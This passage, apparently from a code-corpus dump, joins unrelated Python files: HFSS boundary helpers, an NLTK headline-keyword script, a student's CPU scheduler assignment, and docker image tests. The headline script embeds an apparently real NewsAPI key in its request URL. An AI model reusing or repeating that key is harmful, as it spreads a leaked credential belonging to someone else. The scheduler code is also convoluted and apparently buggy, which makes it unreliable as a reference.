    ScriptEnv.Shutdown()
| {"/hfss3DModeler/hfssModeler.py": ["/hfss3DModeler/__init__.py"], "/hfss3DModeler/hfssFillet.py": ["/hfss3DModeler/__init__.py"], "/hfss3DModeler/hfssGetVertexIDs.py": ["/hfss3DModeler/__init__.py"]} |
49,741 | judealnas/PyHFSS | refs/heads/master | /hfssBoundaries.py | def _wrapToList(x):
if not isinstance(x, list):
x = [x]
return x
def _getBoundsModule(oDesign):
return oDesign.GetModule("BoundarySetup")
def AssignCopperBound(oBounds, bound_name="", obj_names=None, face_ids=None):
    """
    Create a finite-conductivity boundary with copper's material properties
    and zero roughness on the given objects and/or faces.

    HFSS raises an error if *bound_name* already exists; when *bound_name*
    is "" an unused name of the form "FiniteCondN" is generated.

    :param oBounds: oDesign.GetModule("BoundarySetup")
    :param bound_name: Name of the new boundary setup ("" to auto-generate)
    :param obj_names: Object name or list of object names to assign
    :param face_ids: Face ID or list of face IDs to assign
    :return: Name of the newly-created boundary setup

    TO-DO: Generalize to arbitrary finite-conductivity boundaries (custom
    conductivity vs. material, roughness and thickness options, e.g.
    Groisse vs. Huray, infinite vs. DC thickness).
    """
    # Fix: mutable list defaults replaced with None sentinels.
    if obj_names is None:
        obj_names = []
    if face_ids is None:
        face_ids = []
    # If no boundary name provided, generate an unused one.
    if bound_name == "":
        existing_bounds = oBounds.GetBoundaries()
        i = 1
        bound_name = "FiniteCond{}".format(i)
        while bound_name in existing_bounds:
            i = i + 1
            bound_name = "FiniteCond{}".format(i)
    # Ensure target objects and faces are in lists.
    obj_names = _wrapToList(obj_names)
    face_ids = _wrapToList(face_ids)
    oBounds.AssignFiniteCond(
        [
            "NAME:" + bound_name,
            "Objects:=", obj_names,
            "Faces:=", face_ids,
            "UseMaterial:=" , True,
            "Material:=" , "copper",
            "UseThickness:=" , False,
            "Roughness:=" , "0um",
            "InfGroundPlane:=" , False,
            "IsTwoSided:=" , False,
            "IsInternal:=" , True
        ])
    # Fix: the documented return value was missing.
    return bound_name
def DeleteBoundaries(oBounds, bounds):
    """
    Delete the named boundaries from the design.
    :param oBounds: oDesign.GetModule("BoundarySetup")
    :param bounds: list of strings naming boundaries to delete
    """
    # Fix: the method name was misspelled ("DeleteBoundareis"), so every
    # call raised AttributeError.
    oBounds.DeleteBoundaries(bounds)
def GetBoundaries(oBounds):
    """
    List every boundary defined in the target design.
    :param oBounds: oDesign.GetModule("BoundarySetup")
    :return: list of boundary name strings
    """
    boundary_names = oBounds.GetBoundaries()
    return boundary_names
def GetNumBoundaries(oBounds):
    """
    Count the boundaries defined in the target design.
    :param oBounds: oDesign.GetModule("BoundarySetup")
    :return: number of boundaries
    """
    total = oBounds.GetNumBoundaries()
    return total
def ReassignBoundary(oBounds, bound_name, obj_names=[], face_ids=[]):
    """
    Replace the assignment of an existing boundary.

    Leaving both *obj_names* and *face_ids* empty removes every assignment
    of the boundary.
    :param oBounds: oDesign.GetModule("BoundarySetup")
    :param bound_name: name of the boundary to reassign
    :param obj_names: list of object names to assign
    :param face_ids: list of face ID numbers to assign
    """
    assignment = [
        "NAME:" + bound_name,
        "Objects:=", obj_names,
        "Faces:=", face_ids
    ]
    oBounds.ReassignBoundary(assignment)
def AddAssignmentToBoundary(oBounds, bound_name, obj_names=[], face_ids=[]):
    """
    Add objects and/or faces to an existing boundary's assignment.
    :param oBounds: oDesign.GetModule("BoundarySetup")
    :param bound_name: Target boundary setup
    :param obj_names: Object name or list of object names to add
    :param face_ids: Face ID or list of face IDs to add
    :return: None
    """
    # Scalars are accepted and promoted to one-element lists.
    oBounds.AddAssignmentToBoundary([
        "NAME:" + bound_name,
        "Objects:=", _wrapToList(obj_names),
        "Faces:=", _wrapToList(face_ids)
    ])
| {"/hfss3DModeler/hfssModeler.py": ["/hfss3DModeler/__init__.py"], "/hfss3DModeler/hfssFillet.py": ["/hfss3DModeler/__init__.py"], "/hfss3DModeler/hfssGetVertexIDs.py": ["/hfss3DModeler/__init__.py"]} |
49,803 | jloemba/python-nl | refs/heads/master | /stop_word.py | from nltk.corpus import stopwords
from nltk.tokenize import word_tokenize
from nltk.tag import pos_tag
import string
def extract_stop_in_sentence(sentence):
    """Return the proper nouns of *sentence*, minus French stop words.

    The trailing outlet name of a headline (" - Le Monde", " - LCI", ...)
    is stripped first; the remaining text is tokenized and POS-tagged, and
    only tokens tagged 'NNP' (proper noun) are kept.
    """
    if " - " in sentence :
        # Drop the article/outlet suffix from the headline.
        sentence = sentence[:sentence.index(" - ")]
    french_stops = set(stopwords.words('french'))  # stop-word dictionary language
    tagged = pos_tag(word_tokenize(sentence))      # (token, POS tag) pairs
    proper_nouns = [word for word, tag in tagged if tag == 'NNP']
    # Keep only proper nouns that are not common French stop words.
    return [word for word in proper_nouns if word not in french_stops]
def strip_punctuation(sentence):
    """Return *sentence* with every ASCII punctuation character removed.

    Replaces the old implementation, which printed each punctuation
    character it found (debug leftover) and chained one ``str.replace``
    per punctuation character, with a single C-level translate pass.
    """
    return sentence.translate(str.maketrans("", "", string.punctuation))
def remove_punctuation(value):
    """Return *value* without ASCII punctuation characters.

    Builds the result with one ``str.join`` instead of quadratic ``+=``
    string concatenation.
    """
    return "".join(c for c in value if c not in string.punctuation)
#sentence = "Red Dead Redemption 2 arrivera sur PC le 5 novembre, ainsi que sur Google Stadia - Les Numériques" #La phrase concernée
#print(extract_stop_in_sentence(sentence))
| {"/app.py": ["/stop_word.py"]} |
49,804 | jloemba/python-nl | refs/heads/master | /app.py | import pprint
import requests
import pandas as pd
from pandas.io.json import json_normalize
import nltk
from nltk.corpus import stopwords
from nltk.tokenize import word_tokenize
from stop_word import extract_stop_in_sentence , remove_punctuation
# nltk.download()  # run once to install the NLTK data packages
# Fetch the current French technology headlines from NewsAPI.
# NOTE(review): the API key is hard-coded in source — rotate it and load it
# from an environment variable instead of committing it.
dictionary = requests.get('https://newsapi.org/v2/top-headlines?country=fr&category=technology&apiKey=853e02b0ec344bd182ea180e7fb93bf9').json()
stop_words = set(stopwords.words('french'))
data = dictionary['articles']
#pprint.pprint(dictionary['articles'])  # print while keeping the JSON structure
# NOTE(review): the normalized frame is discarded — dead call?
json_normalize(data)
#print(data[)
df = pd.DataFrame(data)
#df["content"].astype(str)
#print(type(df['content'][0]))
#words = df.title.str.split(expand=True).stack()
#words = words[words.isin(selected_words)]
#print(words.value_counts())
# Collect the proper nouns extracted from every headline title.
list_word = []
for item in df.title:
    data = nltk.word_tokenize(str(item))
    if data[0] != 'None':
        #print(' ')
        #print('Title :')
        #print( data[-1] )
        # Rebuild the title, strip punctuation, and keep its proper nouns.
        data = " ".join(str(d) for d in data)
        data = remove_punctuation(data)
        print(data)
        list_word = list_word + extract_stop_in_sentence(data)
#word_tokens = list_word
# Frequency table of the extracted words.
list_word_df = pd.DataFrame({'title':list_word})
print(list_word_df)
count_word_df = list_word_df['title'].value_counts().to_frame()
# NOTE(review): this loop only prints blanks (one per column) — placeholder?
for w in count_word_df:
    print(" ")
#print(nltk.word_tokenize(df['content'][0]))
| {"/app.py": ["/stop_word.py"]} |
49,807 | PaarthB/CPU-Scheduling-Algorithms | refs/heads/master | /FCFS.py | __author__ = "Paarth Bhasin"
__title__ = "Assignment-3 FIT2070: Operating Systems"
__tutor__ = "Hasanul Ferdaus"
__StartDate__ = '20/10/2016'
__studentID__ = 26356104
__LastModified__ = '24/10/2016'
'''
First Come First Serve Scheduler (FCFS)
Uses a queue to implement this scheduling algorithm
OUTPUT:
- Information about each finished process in sequence of completion
- Average Turnaround Time
- Average Waiting Time
- Throughput
'''
from Process import Process
import queue
class FCFS:
    """First Come First Served (non-preemptive) CPU scheduler.

    Processes are read from ``processes.txt`` (one ``name arrival duration``
    triple per line), executed strictly in file order, and per-process plus
    aggregate statistics are printed.
    """

    def __init__(self):
        # Fix: read the workload inside ``with`` so the file handle is
        # closed (the original leaked an open handle).
        with open('processes.txt', 'r') as f:
            self.lines = f.readlines()
        self.ready = queue.Queue(len(self.lines))  # FIFO ready queue
        self.averageT = 0    # sum, later mean, of turnaround times
        self.count = 0       # simulation clock (time units elapsed)
        self.averageW = 0    # sum, later mean, of waiting times
        self.throughput = 0  # processes completed per time unit

    def run(self):
        """Load every process into the ready queue, then dispatch them."""
        for line in self.lines:
            words = line.split(' ')
            p = Process(words[0], int(words[1]), int(words[2]))
            self.ready.append(p)
        self.process()

    def process(self):
        """Serve processes in arrival (file) order until the queue drains."""
        while not self.ready.is_empty():
            p = self.ready.serve()
            self.printProcess(p)
        self.stats()

    def stats(self):
        """Print average waiting time, average turnaround time, throughput."""
        self.averageT /= len(self.lines)
        self.averageW /= len(self.lines)
        print("Average waiting time: " + str(self.averageW))
        print("Average Turnaround time: " + str(self.averageT))
        self.throughput = len(self.lines) / self.averageT
        print("Throughput: " + str(self.throughput))

    def printProcess(self, p):
        """Advance the clock past *p* and print its waiting/turnaround times."""
        # NOTE(review): if the CPU is idle before p arrives this yields a
        # negative waiting time — confirm the workload has no arrival gaps.
        p.waiting = self.count - p.arrival
        p.start = self.count
        self.count += p.duration
        p.turn = self.count - p.start
        print("Process ID: " + str(p.name))
        print("Waiting time: " + str(p.waiting))
        print("Turnaround time: " + str(p.turn) + "\n\n")
        self.averageT += p.turn
        self.averageW += p.waiting
def main():
    """Entry point: announce and run the FCFS scheduler."""
    print("FCFS Scheduler")
    scheduler = FCFS()
    scheduler.run()


if __name__ == "__main__":
    main()
| {"/FCFS.py": ["/Process.py", "/queue.py"], "/RoundRobin.py": ["/Process.py", "/queue.py"], "/comparator.py": ["/FCFS.py", "/RoundRobin.py", "/SRT.py"], "/SRT.py": ["/Process.py"]} |
49,808 | PaarthB/CPU-Scheduling-Algorithms | refs/heads/master | /RoundRobin.py | __author__ = "Paarth Bhasin"
__title__ = "Assignment-3 FIT2070: Operating Systems"
__tutor__ = "Hasanul Ferdaus"
__StartDate__ = '20/10/2016'
__studentID__ = 26356104
__LastModified__ = '24/10/2016'
from Process import Process
import queue
import os
'''
Round Robin Scheduler (RR)
Uses a queue to implement this scheduling algorithm
OUTPUT:
- Information about each finished process in sequence of completion
- Average Turnaround Time
- Average Waiting Time
- Throughput
'''
class RoundRobin:
    """Round Robin CPU scheduler with a fixed time quantum of 2.

    Reads processes from ``processes.txt`` (``name arrival duration`` per
    line), prints each process's statistics as it finishes, then prints the
    aggregate statistics.
    """

    def __init__(self):
        # Fix: read the workload inside ``with`` so the file handle is
        # closed (the original leaked an open handle).
        with open('processes.txt', 'r') as f:
            self.lines = f.readlines()
        self.ready = queue.Queue(len(self.lines))  # circular ready queue
        self.i = 0                # index of the next process to consider
        self.load_var = 0         # index into load_time of last arrival handled
        self.program_counter = 0  # simulation clock
        self.time_quantum = 2     # fixed RR slice length
        self.all = []             # every Process, in file order
        self.load_time = []       # arrival time of each process
        self.averageT = 0         # sum, later mean, of turnaround times
        self.averageW = 0         # sum, later mean, of waiting times
        self.throughput = 0
        self.passed = 0           # NOTE(review): never read — dead state?

    def run(self):
        """Build the process table, then feed arrivals into the ready queue."""
        for line in self.lines:
            words = line.split(' ')
            p = Process(words[0], int(words[1]), int(words[2]))
            self.load_time.append(int(words[1]))
            self.all.append(p)
        while self.i < len(self.lines):
            p = self.all[self.i]
            if p.start == self.program_counter:
                self.ready.append(p)
                self.process()
                self.i += 1
            else:
                self.program_counter += 1
                self.i += 1

    def process(self):
        """Recursively serve the ready queue one time quantum at a time.

        The queue is populated from ``processes.txt``; a process that still
        has work left after its slice is re-appended at the back.
        """
        p = self.ready.serve()
        print(p.name)
        if p.duration <= 0:
            p.duration = 0
        if not self.ready.is_empty() and p.duration > 0:
            p.duration -= self.time_quantum
            if p.duration <= 0:
                # Process completed within this slice: charge only the time
                # actually used and print its final statistics.
                self.program_counter += self.time_quantum + p.duration
                p.duration = 0
                p.turn = self.program_counter - p.start
                p.waiting += self.program_counter - p.start
                print("Process ID: " + str(p.name))
                print("Turnaround time: " + str(p.turn) + '\n')
                self.averageT += p.turn
                self.averageW += p.waiting
                self.process()
            else:
                # Slice expired: re-queue the process at the back.
                p.waiting += self.program_counter - p.start
                self.ready.append(p)
                p.start = self.program_counter
                self.program_counter += self.time_quantum
                self.process()
        elif self.ready.is_empty() and p.duration > 0:
            print("PC: " + str(self.program_counter))
            if self.load_var <= (len(self.load_time) - 2) and self.program_counter <= self.load_time[self.load_var + 1]:
                # More arrivals are still pending: keep slicing this process.
                print(p.duration)
                p.duration -= self.time_quantum
                self.program_counter += self.load_time[self.load_var] + self.time_quantum
                self.ready.append(p)
                self.process()
            else:
                self.load_var += 1
                if self.load_var < len(self.load_time):
                    # Inject the newly arrived process ahead of the current one.
                    p1 = self.all[self.load_var]
                    self.ready.append(p1)
                    self.ready.append(p)
                    self.process()
                else:
                    # Last process: run it to completion and terminate.
                    self.program_counter += p.duration
                    print("PC: " + str(self.program_counter))
                    p.duration = 0
                    p.turn = self.program_counter - p.arrival
                    p.waiting = self.program_counter - p.start
                    print("Process ID: " + str(p.name))
                    print("Turnaround time: " + str(p.turn) + '\n')
                    self.averageT += p.turn
                    self.averageW += p.waiting
                    self.stats()
                    # NOTE(review): hard-exits the interpreter; callers after
                    # run() never regain control on this path.
                    os._exit(0)
        if p.duration <= 0:
            # Process was already finished when served: close out its stats.
            p.duration = 0
            p.turn = (p.arrival + self.program_counter) - p.start
            p.waiting += self.program_counter - p.start
            print("Process ID: " + str(p.name))
            print("Turnaround time: " + str(p.turn) + '\n')
            self.averageT += p.turn
            self.averageW += p.waiting

    def stats(self):
        """Print the clock and the aggregate scheduling statistics."""
        print(self.program_counter)
        self.averageT /= len(self.lines)
        self.averageW /= len(self.lines)
        print("Average waiting time: " + str(self.averageW))
        print("Average Turnaround time: " + str(self.averageT))
        self.throughput = len(self.lines) / self.averageT
        print("Throughput: " + str(self.throughput))
def main():
    """Entry point: announce and run the Round Robin scheduler."""
    print("Round Robin Scheduler")
    scheduler = RoundRobin()
    scheduler.run()


if __name__ == "__main__":
    main()
| {"/FCFS.py": ["/Process.py", "/queue.py"], "/RoundRobin.py": ["/Process.py", "/queue.py"], "/comparator.py": ["/FCFS.py", "/RoundRobin.py", "/SRT.py"], "/SRT.py": ["/Process.py"]} |
49,809 | PaarthB/CPU-Scheduling-Algorithms | refs/heads/master | /comparator.py | __author__ = "Paarth Bhasin"
__title__ = "Assignment-3 FIT2070: Operating Systems"
__tutor__ = "Hasanul Ferdaus"
__StartDate__ = '22/8/2016'
__studentID__ = 26356104
__LastModified__ = '31/8/2016'
from FCFS import FCFS
from RoundRobin import RoundRobin
from SRT import SRT
def main():
    """Run all three schedulers back to back for comparison."""
    # Construct every scheduler first (each reads processes.txt on
    # construction), preserving the original construction order.
    schedulers = [
        ("FCFS Scheduler", FCFS()),
        ("Round Robin Scheduler", RoundRobin()),
        ("Shortest Remaining Time Scheduler", SRT()),
    ]
    for title, scheduler in schedulers:
        print(title)
        scheduler.run()


if __name__ == "__main__":
    main()
| {"/FCFS.py": ["/Process.py", "/queue.py"], "/RoundRobin.py": ["/Process.py", "/queue.py"], "/comparator.py": ["/FCFS.py", "/RoundRobin.py", "/SRT.py"], "/SRT.py": ["/Process.py"]} |
49,810 | PaarthB/CPU-Scheduling-Algorithms | refs/heads/master | /Process.py | __author__ = "Paarth Bhasin"
__title__ = "Assignment-3 FIT2070: Operating Systems"
__tutor__ = "Hasanul Ferdaus"
__StartDate__ = '20/8/2016'
__studentID__ = 26356104
__LastModified__ = '24/10/2016'
class Process:
    """Mutable record of one schedulable process and its statistics."""

    def __init__(self, name="", start=0, duration=0):
        self.name = name          # process identifier
        self.start = start        # time the process (re)starts executing
        self.duration = duration  # remaining CPU burst length
        self.waiting = 0          # accumulated waiting time
        self.turn = 0             # turnaround time once finished
        self.arrival = start      # original arrival time (start may change)
        # Sanity-check field types, in the same order as before.
        for value, expected in ((self.name, str), (self.turn, int),
                                (self.start, int), (self.duration, int),
                                (self.waiting, int), (self.arrival, int)):
            assert isinstance(value, expected)
| {"/FCFS.py": ["/Process.py", "/queue.py"], "/RoundRobin.py": ["/Process.py", "/queue.py"], "/comparator.py": ["/FCFS.py", "/RoundRobin.py", "/SRT.py"], "/SRT.py": ["/Process.py"]} |
49,811 | PaarthB/CPU-Scheduling-Algorithms | refs/heads/master | /SRT.py | __author__ = "Paarth Bhasin"
__title__ = "Assignment-3 FIT2070: Operating Systems"
__tutor__ = "Hasanul Ferdaus"
__StartDate__ = '20/10/2016'
__studentID__ = 26356104
__LastModified__ = '24/10/2016'
# Using priority queue to handle processes based on time remaining.
from PriorityQueue import PriorityQueue
from Process import Process
'''
Shortest Remaining Time Scheduler (SRT)
Uses a priority queue to implement this scheduling algorithm
OUTPUT:
- Information about each finished process in sequence of completion
- Average Turnaround Time
- Average Waiting Time
- Throughput
'''
class SRT:
    """Shortest Remaining Time (preemptive SJF) CPU scheduler.

    Reads processes from ``processes.txt``; a priority queue keyed on
    remaining time always serves the shortest job, and a newly arrived
    process with a shorter remaining time preempts the running one.
    """

    def __init__(self):
        # Fix: read the workload inside ``with`` so the file handle is
        # closed (the original leaked an open handle).
        with open('processes.txt', 'r') as f:
            self.lines = f.readlines()
        self.ready = PriorityQueue()  # min-queue on remaining time
        self.all = []                 # every Process, in file order
        self.i = 0                    # index of the next arrival to inject
        self.finished = 0             # completed-process count
        self.program_counter = 0      # simulation clock
        self.load_time = []           # arrival time of each process
        self.load_var = 0             # index of the last arrival handled
        self.averageT = 0             # sum, later mean, of turnaround times
        self.averageW = 0             # sum, later mean, of waiting times
        self.throughput = 0

    def run(self):
        """Build the process table, then inject arrivals into the queue."""
        for line in self.lines:
            words = line.split(' ')
            p = Process(words[0], int(words[1]), int(words[2]))
            self.load_time.append(int(words[1]))
            self.all.append(p)
        while self.i < len(self.lines):
            p = self.all[self.i]
            if p.start == self.program_counter:
                self.ready.add(p)
                self.process()
                self.i += 1
            else:
                self.i += 1

    def process(self):
        """Recursively serve the minimum-remaining-time process.

        Handles preemption when a newly loaded process has a shorter
        remaining time than the one currently executing.
        NOTE(review): the branch logic below is intricate and appears to
        double-handle some states; treat with care when modifying.
        """
        p = self.ready.serve()
        print(p.name)
        if self.ready.count <= 0 < p.duration:
            # p is the only ready process.
            print("PC: " + str(self.program_counter))
            if self.load_var <= (len(self.load_time) - 2) and self.program_counter < self.load_time[self.load_var + 1]:
                # Run p up to the next arrival, then compare remaining times.
                next_load = self.load_time[self.load_var + 1]
                p.duration -= next_load - self.program_counter
                self.program_counter += next_load
                p.start = self.program_counter
                self.load_var += 1
                if self.all[self.load_var].duration < p.duration:
                    print("Preempt")
                    p1 = self.all[self.load_var]
                    self.ready.add(p)
                    self.ready.add(p1)
                    self.process()
                else:
                    p1 = self.all[self.load_var]
                    self.ready.add(p1)
                    self.program_counter += p.duration
                    self.printProcess(p)
                    if self.finished == len(self.lines):
                        self.stats()
                        # NOTE(review): exit() inside library code — consider
                        # returning to the caller instead.
                        exit(0)
                    else:
                        self.process()
            elif self.load_var <= (len(self.load_time) - 2) and self.program_counter > self.load_time[
                    self.load_var + 1]:
                # The next arrival is already in the past: finish p.
                self.program_counter += p.duration
                self.printProcess(p)
                print("PC: " + str(self.program_counter))
                if self.finished == len(self.lines):
                    self.stats()
                    exit(0)
                else:
                    self.process()
            elif self.load_var > (len(self.load_time) - 2):
                # No arrivals remain: finish p.
                self.program_counter += p.duration
                print("PC: " + str(self.program_counter))
                self.printProcess(p)
                self.load_var += 1
                if self.finished == len(self.lines):
                    self.stats()
                    exit(0)
                else:
                    self.process()
        elif self.ready.count > 0 and p.duration > 0:
            # At least one other ready process: compare with the runner-up.
            print("PC: " + str(self.program_counter))
            p1 = self.ready.serve()
            print(self.load_var)
            if self.load_var <= (len(self.load_time) - 2) and self.program_counter < self.load_time[self.load_var + 1]:
                if p1.duration == p.duration:
                    if p1.arrival < p.arrival:
                        # Tie on remaining time: earlier arrival runs first.
                        self.ready.add(p)
                        self.program_counter -= p1.duration
                        p1.duration = 0
                        p1.start = self.program_counter
                        self.process()
                        if self.all[self.load_var].duration < p1.duration:
                            p = self.all[self.load_var]
                            self.ready.add(p)
                            self.ready.add(p1)
                            self.process()
                        else:
                            p = self.all[self.load_var]
                            self.ready.add(p)
                            self.program_counter += p1.duration
                            self.printProcess(p1)
                            if self.finished == len(self.lines):
                                self.stats()
                                exit(0)
                            else:
                                self.process()
                    else:
                        # p keeps the CPU until the next arrival.
                        self.ready.add(p1)
                        next_load = self.load_time[self.load_var + 1]
                        p.duration -= next_load - self.program_counter
                        self.program_counter += next_load - self.program_counter
                        p.start = self.program_counter
                        self.load_var += 1
                        if self.all[self.load_var].duration < p.duration:
                            p1 = self.all[self.load_var]
                            self.ready.add(p)
                            self.ready.add(p1)
                            self.process()
                        else:
                            p1 = self.all[self.load_var]
                            self.ready.add(p1)
                            self.program_counter += p.duration
                            self.printProcess(p)
                            if self.finished == len(self.lines):
                                self.stats()
                                exit(0)
                            else:
                                self.process()
                else:
                    # Distinct remaining times: run p to the next arrival.
                    self.ready.add(p1)
                    next_load = self.load_time[self.load_var + 1]
                    p.duration -= next_load - self.program_counter
                    p.start = self.program_counter
                    self.program_counter += next_load - self.program_counter
                    self.load_var += 1
                    if self.all[self.load_var].duration < p.duration:
                        p1 = self.all[self.load_var]
                        self.ready.add(p)
                        self.ready.add(p1)
                        # NOTE(review): finished is incremented here without
                        # printProcess — looks inconsistent with other paths.
                        self.finished += 1
                        if self.finished == len(self.lines):
                            self.stats()
                            exit(0)
                        else:
                            self.process()
                    else:
                        p1 = self.all[self.load_var]
                        self.ready.add(p1)
                        self.program_counter += p.duration
                        self.printProcess(p)
                        if self.finished == len(self.lines):
                            self.stats()
                            exit(0)
                        else:
                            self.process()
            elif self.load_var <= (len(self.load_time) - 2) and self.program_counter == self.load_time[
                    self.load_var + 1]:
                # An arrival lands exactly now: fold it into the comparison.
                p2 = self.all[self.load_var + 1]
                if p.duration == p1.duration:
                    if p1.arrival >= p.arrival:
                        self.ready.add(p1)
                        if p2.duration < p.duration:
                            self.ready.add(p)
                            p = p2
                            self.program_counter += p.duration
                            self.printProcess(p)
                            if self.finished == len(self.lines):
                                self.stats()
                                exit(0)
                            else:
                                self.process()
                        else:
                            self.ready.add(p2)
                            self.program_counter += p.duration
                            self.printProcess(p)
                            if self.finished == len(self.lines):
                                self.stats()
                                exit(0)
                            else:
                                self.process()
                    else:
                        self.ready.add(p)
                        if p2.duration < p1.duration:
                            self.ready.add(p1)
                            p = p2
                            self.program_counter += p.duration
                            self.printProcess(p)
                            if self.finished == len(self.lines):
                                self.stats()
                                exit(0)
                            else:
                                self.process()
                        else:
                            self.ready.add(p2)
                            p = p1
                            self.program_counter += p.duration
                            self.printProcess(p)
                            if self.finished == len(self.lines):
                                self.stats()
                                exit(0)
                            else:
                                self.process()
                else:
                    self.ready.add(p1)
                    if p2.duration < p.duration:
                        self.ready.add(p)
                        p = p2
                        self.program_counter += p.duration
                        self.printProcess(p)
                        if self.finished == len(self.lines):
                            self.stats()
                            exit(0)
                        else:
                            self.process()
                    else:
                        self.ready.add(p2)
                        self.program_counter += p.duration
                        self.printProcess(p)
                        if self.finished == len(self.lines):
                            self.stats()
                            exit(0)
                        else:
                            self.process()
            elif self.load_var <= (len(self.load_time) - 2) and self.program_counter > self.load_time[
                    self.load_var + 1]:
                # Past the next arrival time: resolve ties by arrival order.
                if p.duration == p1.duration:
                    if p.arrival <= p1.arrival:
                        self.ready.add(p1)
                        p.arrival = self.load_time[self.load_var]
                        self.program_counter += p.duration
                        print("PC: " + str(self.program_counter))
                        self.printProcess(p)
                        if self.finished == len(self.lines):
                            self.stats()
                            exit(0)
                        else:
                            self.process()
                    else:
                        self.ready.add(p)
                        p1.start = self.program_counter
                        p1.arrival += p1.duration
                        self.program_counter += p1.duration
                        self.printProcess(p1)
                        if self.finished == len(self.lines):
                            self.stats()
                            exit(0)
                        else:
                            self.process()
                else:
                    self.ready.add(p1)
                    self.program_counter += p.duration
                    print("PC: " + str(self.program_counter))
                    p.arrival = self.load_time[self.load_var]
                    self.printProcess(p)
                    self.load_var += 1
                    if self.finished == len(self.lines):
                        self.stats()
                        exit(0)
                    else:
                        self.process()
            elif self.load_var > (len(self.load_time) - 2):
                # No arrivals remain: the shorter of p and p1 runs first.
                if p.duration < p1.duration:
                    p.start = self.program_counter
                    self.ready.add(p1)
                    self.printProcess(p)
                    print("PC: " + str(self.program_counter))
                    if self.finished == len(self.lines):
                        self.stats()
                        exit(0)
                    else:
                        self.process()
                elif p.duration > p1.duration:
                    self.ready.add(p)
                    p = p1
                    p.start = self.program_counter
                    self.printProcess(p)
                    if self.finished == len(self.lines):
                        self.stats()
                        exit(0)
                    else:
                        self.process()

    def stats(self):
        """Print the aggregate scheduling statistics."""
        self.averageT /= len(self.lines)
        self.averageW /= len(self.lines)
        print("Average waiting time: " + str(self.averageW))
        print("Average Turnaround time: " + str(self.averageT))
        self.throughput = len(self.lines) / self.averageT
        print("Throughput: " + str(self.throughput))

    def printProcess(self, p):
        """Finalize *p*'s statistics at the current clock and print them."""
        p.waiting += p.start - p.arrival
        p.turn += self.program_counter - p.start
        p.duration = 0
        self.averageT += p.turn
        self.averageW += p.waiting
        print("Process ID: " + p.name)
        print("Waiting time: " + str(p.waiting))
        print("Turnaround Time: " + str(p.turn))
        self.finished += 1
def main():
    """Entry point: announce the scheduler and run the SRT simulation."""
    print("SRT Scheduler\n")
    SRT().run()
if __name__ == "__main__":
    main()
| {"/FCFS.py": ["/Process.py", "/queue.py"], "/RoundRobin.py": ["/Process.py", "/queue.py"], "/comparator.py": ["/FCFS.py", "/RoundRobin.py", "/SRT.py"], "/SRT.py": ["/Process.py"]} |
49,812 | PaarthB/CPU-Scheduling-Algorithms | refs/heads/master | /queue.py | __author__ = "Paarth Bhasin"
__title__ = "Assignment-3 FIT2070: Operating Systems"
__tutor__ = "Hasanul Ferdaus"
__StartDate__ = '20/8/2016'
__studentID__ = 26356104
__LastModified__ = '24/10/2016'
class Queue:
    """Fixed-capacity circular (ring-buffer) FIFO queue."""

    def __init__(self, size):
        """Create an empty queue able to hold at most ``size`` items."""
        assert size > 0, "size should be positive"
        self.the_array = [None] * size
        self.front = 0  # index of the oldest item
        self.rear = 0   # index where the next appended item is stored
        self.count = 0  # number of items currently held

    def is_full(self):
        """Return True when the queue holds its maximum number of items.

        Bug fix: the previous check was ``rear >= len(the_array)``, but
        append() wraps ``rear`` with modulo arithmetic so it is always
        strictly less than the array length — the queue never reported
        full and append() could silently overwrite unserved items.
        The item count is the reliable fullness indicator.
        """
        return self.count >= len(self.the_array)

    def is_empty(self):
        """Return True when the queue holds no items."""
        return self.count == 0

    def reset(self):
        """Discard all items and return to the initial empty state."""
        self.front = 0
        self.rear = 0
        self.count = 0

    def append(self, new_item):
        """Add ``new_item`` at the rear; the queue must not be full."""
        assert not self.is_full(), "Queue is full"
        self.the_array[self.rear] = new_item
        self.rear = (self.rear + 1) % len(self.the_array)
        self.count += 1

    def serve(self):
        """Remove and return the front item; the queue must not be empty."""
        assert not self.is_empty(), "Queue is empty"
        item = self.the_array[self.front]
        self.front = (self.front + 1) % len(self.the_array)
        self.count -= 1
        return item

    def print(self):
        """Print every queued item, front to rear, one per line."""
        index = self.front
        for _ in range(self.count):
            print(str(self.the_array[index]))
            index = (index + 1) % len(self.the_array)
| {"/FCFS.py": ["/Process.py", "/queue.py"], "/RoundRobin.py": ["/Process.py", "/queue.py"], "/comparator.py": ["/FCFS.py", "/RoundRobin.py", "/SRT.py"], "/SRT.py": ["/Process.py"]} |
49,863 | arnegroskurth/python-on-whales | refs/heads/master | /tests/python_on_whales/components/test_image.py | import pytest
from python_on_whales import DockerException, docker
from python_on_whales.components.image import ImageInspectResult
from python_on_whales.test_utils import random_name
def test_image_remove():
    """Two pulled tags can be removed with a single remove() call."""
    for tag in ("busybox:1", "busybox:1.32"):
        docker.image.pull(tag, quiet=True)
    docker.image.remove(["busybox:1", "busybox:1.32"])
def test_image_save_load(tmp_path):
    """An image saved to a tarball can be re-loaded after removal."""
    archive = tmp_path / "dodo.tar"
    docker.image.pull("busybox:1", quiet=True)
    docker.image.save("busybox:1", output=archive)
    docker.image.remove("busybox:1")
    assert docker.image.load(input=archive) == ["busybox:1"]
def test_save_iterator_bytes():
    """Saving without an output path yields a multi-chunk byte stream."""
    docker.image.pull("busybox:1", quiet=True)
    stream = docker.image.save("busybox:1")
    for index, chunk in enumerate(stream):
        if index == 0:
            # The very first chunk must already carry data.
            assert len(chunk) != 0
    # More than one chunk must have been produced.
    assert index != 0
def test_save_iterator_bytes_fails():
    """Consuming the save stream of a missing tag raises DockerException."""
    docker.image.pull("busybox:1", quiet=True)
    stream = docker.image.save("busybox:42")
    with pytest.raises(DockerException) as err:
        for _ in stream:
            pass
    message = str(err.value)
    assert "docker image save busybox:42" in message
    assert "Error response from daemon: reference does not exist" in message
def test_save_iterator_bytes_and_load():
    """A tarball reassembled from the save stream can be loaded back."""
    tag = "busybox:1"
    docker.image.pull(tag, quiet=True)
    tarball = b"".join(docker.image.save(tag))
    docker.image.remove(tag)
    assert docker.image.load(tarball) == [tag]
    docker.image.inspect(tag)
def test_save_iterator_bytes_and_load_from_iterator():
    """load() accepts the save() iterator directly, without materializing."""
    tag = "busybox:1"
    docker.image.pull(tag, quiet=True)
    assert docker.image.load(docker.image.save(tag)) == [tag]
    docker.image.inspect(tag)
def test_save_iterator_bytes_and_load_from_iterator_list_of_images():
    """Several images can be saved and re-loaded through one stream."""
    tags = ["busybox:1", "hello-world:latest"]
    for tag in tags:
        docker.image.pull(tag, quiet=True)
    assert set(docker.image.load(docker.image.save(tags))) == set(tags)
    for tag in tags:
        docker.image.inspect(tag)
def test_image_list():
